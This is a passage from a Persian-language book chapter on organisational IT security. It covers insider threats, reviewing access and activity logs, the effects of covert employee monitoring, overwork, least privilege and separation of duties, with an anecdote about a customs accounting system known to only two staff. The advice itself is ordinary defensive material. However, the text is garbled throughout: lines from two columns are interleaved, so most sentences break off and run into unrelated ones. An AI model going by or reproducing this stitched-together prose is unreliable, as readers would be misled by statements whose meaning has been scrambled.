ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﭘـﺮ ﺍﺭﺯﺵ ﻋﻤﻮﻣﻲ.
ﺳﺎﺯﻣﺎﻥ -ﺧﻮﺩ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﻧﻴﺰ ﻣﻨﺎﺑﻌﻲ ﻛـﻪ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﻟﺒﺘﻪ ﺍﻧﺪﺍﺯﻩ ﻭ ﻃﺒﻴﻌﺖ ﺳـﺎﺯﻣﺎﻥ ،ﺳـﻄﺢ ﺗﻬﺪﻳـﺪﺍﺕ ﻭ ﺿـﺮﺭﻫﺎﻱ
ﺩﺍﺭﻧﺪ -ﻣﻲﺑﺎﺷﺪ. ﺍﺣﺘﻤﺎﻟﻲ ،ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺗﻌﺪﺍﺩ ﻭ ﺭﻓﺘﺎﺭ ﻛﺎﺭﻛﻨﺎﻥ ﻫﻤﻪ ﻭ ﻫﻤﻪ ﺍﺯ ﻣﻮﺍﺭﺩﻱ
ﻫﺴﺘﻨﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺗﻨﻈﻴﻢ ﻃﺮﺣﻬـﺎ ﺑﺎﻳـﺪ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ.
ﺑﺎﺯﺑﻴﻨﻲ ﺩﺳﺘﺮﺳﻴﻬﺎ
ﻲ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑـﻪ ﺍﺑـﺰﺍﺭ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﻣﻜﺎﻥ ﺑﺎﺯﺑﻴﻨ ﹺ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﮔﺎﻫﻲﺑﺨـﺶ ﻧﻴـﺰ ﺑﺎﻳـﺪ ﺍﺯ ﻗﺒـﻞ ﺩﺭﻧﻈـﺮ
ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻫﺮﻛﺲ ﻛـﻪ ﮔﺮﻓﺘﻪ ﻭ ﺩﺭ ﺑﻮﺩﺟﺔ ﺳﺎﺯﻣﺎﻥ ﺁﻣﺪﻩ ﺑﺎﺷﻨﺪ.
ﺍﺯ ﻫﺮ ﻧﻮﻉ ﺩﺳﺘﺮﺳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﺯ ﻭﺟـﻮﺩ ﺍﻳـﻦ ﺑـﺎﺯﺑﻴﻨﻲﻫـﺎ ﺑﺮﺭﺳﻲ ﻭ ﻛﻨﺘﺮﻝ ﻛﺎﺭﺁﻳﻲ
ﺍﻃﻼﻉ ﺩﺍﺭﺩ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑـﻪ ﺍﻳـﻦ
ﻛﺎﺭﺁﻳﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﺮﺭﺳﻲ ﺷﻮﺩ .ﺑﻄﻮﺭ
ﺩﻟﻴﻞ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﻧﻔـﻮﺫﮔﺮ ﺍﺣـﺴﺎﺱ ﻣـﻲﻛﻨـﺪ ﻛـﺴﻲ ﺧﺎﺹ ،ﺩﺭ ﻗﺒﺎﻝ ﺭﺷﺪ ﺣﺮﻓﻪ ﺍﻱ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻣﻮﻓـﻖ ﺑﺎﻳـﺪ ﺑـﻪ
ﻣﺘﻮﺟﻪ ﻛﺎﺭﻫﺎﻱ ﺍﻭ ﻧﺨﻮﺍﻫﺪ ﺷـﺪ .ﺍﮔـﺮ ﻳـﻚ ﺗﺒﻬﻜـﺎﺭ ﺑﺪﺍﻧـﺪ ﻛـﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﻣﺘﻴﺎﺯ ﻭ ﭘﺎﺩﺍﺵ ﺗﻌﻠﻖ ﺑﮕﻴﺮﺩ .ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻣـﺸﻜﻼﺕ
ﻓﻌﺎﻟﻴﺘﻬﺎﻳﺶ ﺑﻪ ﺛﺒﺖ ﻣﻲﺭﺳﺪ ﻣﻤﻜﻦ ﺍﺯ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻱ ﻣﺨـﺮﺏ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺗﻲ ﺳﺎﺯﻧﺪﻩ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺣﻞ ﺷﻮﻧﺪ .ﺷﻤﺎ ﺑﺎﻳﺪ ﻛﺎﺭﻣﻨﺪﺍﻥ
ﺧﻮﺩ ﺻﺮﻓﻨﻈﺮ ﻛﻨﺪ .ﻣﻨﻈـﻮﺭ ﺍﺯ ﺑـﺎﺯﺑﻴﻨﻲ ﺗﻨﻬـﺎ ﺑـﺎﺯﺑﻴﻨﻲ ﺛﺒﺘﻬـﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺗﻮﺍﻧﺎﻳﻴﻬﺎ ﻭ ﺩﺭﻙ ﺑﻴﺸﺘﺮ ﺗﺸﻮﻳﻖ ﻛﻨﻴﺪ.
ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻧﻴــﺴﺖ؛ ﺑﻠﻜــﻪ ﮔﺰﺍﺭﺷــﺎﺕ ﻭﺭﻭﺩ ﻭ ﺧــﺮﻭﺝ ﺍﻓــﺮﺍﺩ ﺍﺯ
ﺳﺎﺧﺘﻤﺎﻥ ،ﺳـﻮﺍﺑﻖ ﺍﺳـﺘﻔﺎﺩﺓ ﺍﻓـﺮﺍﺩ ﺍﺯ ﻗﻔﻠﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،ﻭ ﺷـﻤﺎ ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺍﺯ ﺑﻮﺟــﻮﺩ ﺁﻣـﺪﻥ ﺷـﺮﺍﻳﻄﻲ ﻛـﻪ ﺩﺭ ﺁﻧﻬــﺎ
ﻫﻤﭽﻨﻴﻦ ﻧﻮﺍﺭﻫﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻥ ﻣﺪﺍﺭ ﺑﺴﺘﻪ ،ﻫﻤﮕﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﻛﺎﺭﻛﻨﺎﻥ ﺍﺣﺴﺎﺳﻬﺎﻱ ﻣﺨﺮﺑﻲ ﭼﻮﻥ ﺧﺴﺘﮕﻲ ﻣﻔﺮﻁ ﺍﺯ ﻛﺎﺭ ﺯﻳـﺎﺩ،
ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺗﺎ ﺯﻣﻴﻨﻪ ﺑﺮﺍﻱ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﻣﻬﻴـﺎ ﺑﻲﺍﺣﺘﺮﺍﻣﻲ ،ﻭ ﻳﺎ ﺑﻲﺗﻮﺟﻬﻲ ﭘﻴﺪﺍ ﻣـﻲﻛﻨﻨـﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴـﺪ.
ﺷﻮﺩ. ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ ﺩﺭ ﺍﺩﺍﺭﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻨﺠـﺮ ﺑـﻪ
ﺑﺎ ﺗﻤﺎﻡ ﺍﻳﻦ ﺍﺣﻮﺍﻝ ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺁﺛﺎﺭ ﻛﻨﺘﺮﻟﻬـﺎ ﭘﻨﻬـﺎﻧﻲ ﻫـﻢ ﺑـﻮﺩ. ﺑﻲﺗﻮﺟﻬﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺑﻪ ﻣﻨﺎﻓﻊ ﺳﺎﺯﻣﺎﻥ ﺷـﻮﺩ .ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ
ﺍﻓﺮﺍﺩ ﺍﺯ ﺍﻳﻨﻜﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﺘﻤﺎﺩ ﻧﺸﻮﺩ ﻭ ﺑﻄﻮﺭ ﻣﺨﻔﻴﺎﻧﻪ ﺗﺤﺖ ﻧﻈـﺮ ﺍﺳﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺭ ﻓﺮﺻﺘﻬﺎﻱ ﻣﻨﺎﺳـﺒﺘﺮ ﺷـﻐﻠﻲ
ﺑﺎﺷﻨﺪ ﺍﺣﺴﺎﺱ ﻧﺎﺧﺮﺳﻨﺪﻱ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﺍﮔﺮ ﺑﻔﻬﻤﻨـﺪ ﻛـﻪ ﺗﺤـﺖ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺮﻙ ﻛﻨﻨﺪ؛ ﻳﺎ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ
ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺼﺒﺎﻧﻲ ﺷﻮﻧﺪ ﻭ ﺣﺘـﻲ ﻋﻤﻠﻜـﺮﺩﻱ ﺍﻧﺘﻘﺎﻣﮕﻴﺮﻱ ﺩﺭ ﺑﻌﻀﻲ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﺷﻮﺑﮕﺮﺍﻧﻪ ﻋﻠﻴﻪ ﺷﻤﺎ ﻫﻤﻜﺎﺭﻱ
ﺍﻓﺮﺍﻃﻲ ﺍﺯ ﺧﻮﺩ ﺑﺮﻭﺯ ﺩﻫﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺩﺍﺩﺳـﺮﺍﻫﺎ ﻧﻤﺎﻳﻨﺪ .ﺍﺿﺎﻓﻪﻛﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺜﻨﺎ -ﻭ ﻧﻪ ﻳﻚ ﺭﻭﺍﻝ -
ﺩﻳﺪﻩﺷﺪﻩ ﻛﻪ ﻗـﺎﻧﻮﻥ ﻛـﺎﺭ ﻭ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻱ ﺍﺳـﺘﺨﺪﺍﻣﻲ ﺗﻮﺍﻧـﺴﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﻪ ﺗﻤﺎﻡ ﻛﺎﺭﻣﻨﺪﺍﻥ -ﺧﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ ﻛـﻪ ﺩﺭ ﭘـﺴﺘﻬﺎﻱ
ﺑﺎﻋﺚ ﺭﻭﺑﺮﻭ ﺷﺪﻥ ﻛﺎﺭﻓﺮﻣﺎ ﺑﺎ ﺩﺍﺩﺭﺳﻴﻬﺎﻱ ﺳﻨﮕﻴﻦ ﻣﺪﻧﻲ ﺷﻮﺩ. ﺣﺴﺎﺱ ﻫﺴﺘﻨﺪ -ﺑﺎﻳﺪ ﺗﻌﻄﻴﻼﺕ ﻭ ﺍﻭﻗـﺎﺕ ﻓﺮﺍﻏـﺖ ﻛـﺎﻓﻲ ﺩﺍﺩﻩ
ﺷﻮﺩ .ﺍﺿﺎﻓﻪﻛﺎﺭﻱ ﺑـﻪ ﺷـﺪﺕ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺭﺍ ﺧـﺴﺘﻪ ﻣـﻲ ﻛﻨـﺪ ﻭ
ﺍﮔﺮ ﻧﻈﺎﺭﺕ ﺑﺴﻴﺎﺭ ﺩﻗﻴﻖ ﺑﺎﺷﺪ ﺻﺮﻑ ﻣﻄﻠﻊ ﻛـﺮﺩﻥ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﺯ ﺧﺴﺘﮕﻲ ﻧﻴﺰ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺿﺮﻳﺐ ﺧﻄـﺎﻱ ﺁﻧﻬـﺎ ﺑـﺎﻻ ﺭﻭﺩ،
ﺍﻳﻨﻜﻪ ﺗﺤﺖ ﻧﻈﺮ ﻫﺴﺘﻨﺪ ﻛﺎﻓﻲ ﻧﻴﺴﺖ .ﺑﻌﻀﻲ ﻣﻄﺎﻟﻌـﺎﺕ ﻧـﺸﺎﻥ ﻣﺘﻮﺟﻪ ﺍﺷﻜﺎﻻﺕ ﻧﺸﻮﻧﺪ ﻳﺎ ﺍﺯ ﺁﻧﻬﺎ ﭼﺸﻢﭘﻮﺷﻲ ﻛﻨﻨﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ
ﺩﺍﺩﻩ ﻛﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭﻗﺘﻲ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺷﺪﻳﺪ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ ﺍﺯ ﻧﻈﺮ ﻋﺎﻃﻔﻲ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺩﺭ ﺯﻧﺪﮔﻲ ﺧﺼﻮﺻﻲ
ﻼ ﺍﮔﺮ ﺷﻤﺎ ﻛﺎﺭﺍﻳﻲ ﻛﻤﺘﺮ ﻭ ﺭﻓﺘﺎﺭ ﻧﺎﻣﻨﺎﺳﺒﺘﺮﻱ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ .ﻣﺜ ﹰ ﺁﻧﻬﺎ ﻧﻴﺰ ﻓﺸﺎﺭﻫﺎﻱ ﻋﺼﺒﻲ ﺑﻮﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺁﻣﺪ ،ﭼﺮﺍﻛﻪ ﺧﺎﻧﻮﺍﺩﻩﻫـﺎ
ﺑﺨﻮﺍﻫﻴﺪ ﺯﻣﺎﻥ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﻛﺎﺭﻛﻨﺎﻥ ،ﻫﺮ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛﻪ ﺍﺯ ﺁﻥ ﻭ ﻋﺰﻳﺰﺍﻧﺸﺎﻥ ﻫﻢ ﻣﻲﺧﻮﺍﻫﻨﺪ ﮔﻬﮕﺎﻩ ﺩﺭ ﻃﻮﻝ ﺭﻭﺯ ﺁﻧﻬﺎ ﺭﺍ ﺑﺒﻴﻨﻨﺪ.
ﺑﺎﺯﺩﻳﺪ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒـﺎﺭ ﺑـﻪ ﺍﺳـﺘﺮﺍﺣﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺑﻴﺶ ﺍﺯ ﺍﻧﺪﺍﺯﻩ ﺗﺤﺖ ﻓﺸﺎﺭ ﻭ ﺧـﺴﺘﻪ ﺑﺎﺷـﻨﺪ
ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ،ﺁﻧﮕﺎﻩ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺁﺯﺭﺩﻩﺧـﺎﻃﺮ ﺷـﻮﻧﺪ ﻭ ﺑـﺪﻳﻬﻲ
ﻼ ﺻﺤﺖ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺑﻬﺘﺮﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﺁﻧﻬـﺎﻳﻲ ﻫـﺴﺘﻨﺪ ﻛﺎﻣ ﹰ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ ﻫﻴﭻ ﻛﻤﻜﻲ ﻧﺨﻮﺍﻫﺪ ﻛﺮﺩ.
ﻛﻪ ﺑﺎ ﻧﻈﺮ ﻣﺴﺎﻋﺪ ﻭ ﺗﺸﺮﻳﻚ ﻣﺴﺎﻋﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﺪﻭﻳﻦ ﺷـﻮﻧﺪ ﻭ
ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﻫﻢ )ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﺨﺸﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ( ﺑﻄﻮﺭ ﻛﻠﻲ ﻋﻼﺋﻢ ﻓﺸﺎﺭﻫﺎﻱ ﺭﻭﺍﻧـﻲ ﺯﻳـﺎﺩ ،ﻣـﺴﺎﺋﻞ ﺷﺨـﺼﻲ ﻭ
ﻫﻨﮕﺎﻡ ﺗﺪﻭﻳﻦ ﺁﻥ ﺣﻀﻮﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ. ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻣﺸﻜﻼﺕ ﻛﺎﺭﻛﻨﺎﻧﻲ ﻛﻪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﻧـﺴﺒﺘﹰﺎ
١٦٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺳﻴﺴﺘﻢ ﺣﺴﺎﺑﺪﺍﺭﻱ ﮔﻤﺮﻛﻲ ﺧﻮﺩ ﻭ ﻭﺍﺭﺩﺍﺕ ﺳﻔﺎﺭﺷﺎﺕ ﻧﻤﻮﺩ .ﺍﻳﻦ ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻲ ﻭ ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ
ﺳﻴﺴﺘﻢ ﺑﺎ ﻳﻚ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻛﻪ ﺑﻪ ﺳﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ ﺍﺻﻮﻝ ﺩﺳﺘﺮﺳﻲ ﺣﺪﺍﻗﻠﻲ ﻭ ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ ﺭﺍ ﺑﻪ ﺩﻗـﺖ ﺩﺭﻧﻈـﺮ
ﻧﺒﻮﺩ ﺗﻬﻴﻪ ﺷﺪ ﻭ ﺷﺮﻛﺘﻲ ﻛﻪ ﺁﻧﺮﺍ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺑﻮﺩ ﭘـﺲ ﺍﺯ ﻣـﺪﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﻳﻦ ﺍﺻﻮﻝ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﻛـﺎﺭﺁﻳﻲ ﺧـﻮﺩ ﺭﺍ ﺛﺎﺑـﺖ
ﻛﻮﺗﺎﻫﻲ ﻛﺎﺭ ﺗﺠﺎﺭﺕ ﺭﺍ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺖ .ﺩﺭ ﺁﻥ ﺷﺮﻛﺖ ﺗﻨﻬﺎ ﺩﻭ ﻧﻔﺮ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻫﺮﮔﺎﻩ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺷﻤﺎ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺑﺎﺷـﻨﺪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ
ﺑﻪ ﻧﺤـﻮﺓ ﻛـﺎﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﺁﺷـﻨﺎ ﺑﻮﺩﻧـﺪ :ﻣـﺪﻳﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﺲ ﺍﻭ .ﺍﻳـﻦ ﺩﻭ ﻧﻔـﺮﺍﻃﻼﻋﺎﺕ ﻣﺪﻳﺮﻳﺖ ) ٩٨(MISﻭ ﻧﻴﺰ ﺑﺮﻧﺎﻣﻪﻧﻮﻳ ﹺ
ﻣﺴﺌﻮﻝ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺳﻴـﺴﺘﻢ ﺣـﺴﺎﺑﺪﺍﺭﻱ، ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻲ
ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﮔﺰﺍﺭﺷـﺎﺕ ﺳـﺎﻻﻧﻪ ،ﺗﻌﻤﻴـﺮ ﺗﺠﻬﻴـﺰﺍﺕ ﺍﺯﻛﺎﺭﺍﻓﺘـﺎﺩﺓ ﺍﻳﻦ ﺍﺻﻞ ﻣﻲﮔﻮﻳﺪ ﻛﻤﺘﺮﻳﻦ ﺩﺳﺘﺮﺳﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﺭﺍ
ﺭﺍﻳﺎﻧﻪ ،ﻭ ﺣﺘﻲ ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ )ﻛـﻪ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤﻮﻃـﺔ ﻲ ﻣﺤﺪﻭﺩﺷـﺪﻩ ،ﻫـﻢ ﺷـﺎﻣﻞ ﺑﻪ ﻫﺮ ﻓـﺮﺩ ﺑﺪﻫﻴـﺪ .ﺍﻳـﻦ ﺩﺳﺘﺮﺳـ ﹺ
ﺍﺩﺍﺭﻱ ﺷﺮﻛﺖ ﻭ ﺩﺭ ﺩﻓﺘﺮ ﻣﺪﻳﺮ MISﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ( ﺑﻮﺩﻧﺪ. ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ﺍﺳﺖ )ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ،ﺷـﺒﻜﻪﻫـﺎ،
ﺑﺮﻧﺎﻣﻪﻫﺎ( ﻭ ﻫﻢ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ )ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ،ﻧﻮﺍﺭﻫـﺎﻱ
ﺲ ﺍﻭ ﻳـﻚ ﺭﻭﺯ ﺩﺭ ﺭﺍﻩ ﺩﭼـﺎﺭ ﻳـﻚ ﺍﮔﺮ ﻣﺪﻳﺮ MISﻭ ﺑﺮﻧﺎﻣﻪﻧﻮﻳ ﹺ ﭘــﺸﺘﻴﺒﺎﻥ ﻭ ﺳــﺎﻳﺮ ﺗﺠﻬﻴ ـﺰﺍﺕ ﺟــﺎﻧﺒﻲ( .ﺍﮔــﺮ ﻫ ـﺮ ﻛــﺎﺭﺑﺮ ﺭﻭﻱ ﻫﻤــﺔ
ﺗﺼﺎﺩﻑ ﻣﺮﮔﺒﺎﺭ ﻣﻲﺷﺪﻧﺪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣـﻲﺍﻓﺘـﺎﺩ؟ ﺍﮔـﺮ ﺑـﻪ ﻣـﺪﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻭ ﺑﻪ ﺗﻤﺎﻡ ﻣﻨﺎﺑﻊ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ
MISﺷﻐﻠﻲ ﻣﻨﺎﺳﺒﺘﺮ ﺑﺎ ﺣﻘﻮﻕ ﭼﻨﺪﺑﺮﺍﺑﺮ ﭘﻴﺸﻨﻬﺎﺩ ﻣـﻲﺷـﺪ ﭼـﻪ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺁﻧﮕﺎﻩ ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻧﻈـﺮ ﻣﻴـﺰﺍﻥ ﺗﻬﺪﻳـﺪ ﺗﻘﺮﻳﺒـﹰﺎ
ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﻣﻲﺩﺍﺩ؟ ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﻧـﻮﻳﺲ ﺑﺨـﺎﻃﺮ ﻧﻴـﺎﺯ ﺷـﺮﻛﺖ ﺑـﻪ
ﺑﺨﺶ ﺳﻮﻡ
ﻫﻤﺴﺮﺍﺷﺎﻥ ﺩﺭ ﭘﻴﻮﻧﺪ ﺯﻧﺎﺷﻮﻳﻲ ،ﺩﻳﺴﻜﻬﺎ ﺭﺍ ﻣـﻮﺭﺩ ﻭﺍﺭﺳـﻲ ﻗـﺮﺍﺭ ﺻﻨﺪﻭﻗﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ؛ ﻭ ﻳﺎ ﻗﻄﻊ ﺩﺳﺘﺮﺳـﻴﻬﺎ ﺑـﻪ ﺗﻤـﺎﻡ ﺍﻳـﻦ
ﺩﺍﺩﻩﺍﻧــﺪ .ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ ﺗﺠــﺎﺭﻱ ﻧﻴــﺰ ﮔﺰﺍﺭﺷــﺎﺗﻲ ﺩﺭ ﻣــﻮﺭﺩ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺎﺷﺪ.
ﻧﻈﺎﻓﺘﭽﻲﻫﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﻮﻗﺖ ﺩﻓﺘـﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺣـﻴﻦ ﺩﺭ ﺑﺮﺧﻲ ﻣﺤﻴﻄﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻛﺎﺭﻫـﺎ ﺗـﺄﺛﻴﺮﺍﺕ
ﺧﺮﺍﺑﻜﺎﺭﻱ ﻳﺎ ﺟﺎﺳﻮﺳﻲ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺮﻛﺖ ﺩﺳﺘﮕﻴﺮ ﺷﺪﻩﺍﻧﺪ. ﻼ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﺭ ﻳـﻚ ﺩﺍﻧـﺸﮕﺎﻩ، ﮔﺴﺘﺮﺩﻩﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻣﺜ ﹰ
ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﭘﺪﺭ ﻭ ﻣﺎﺩﺭ ﺧﻮﺩ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻞ ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺗﺎ ﻣﺎﻫﻬﺎ ﻳﺎ ﺳﺎﻟﻬﺎ
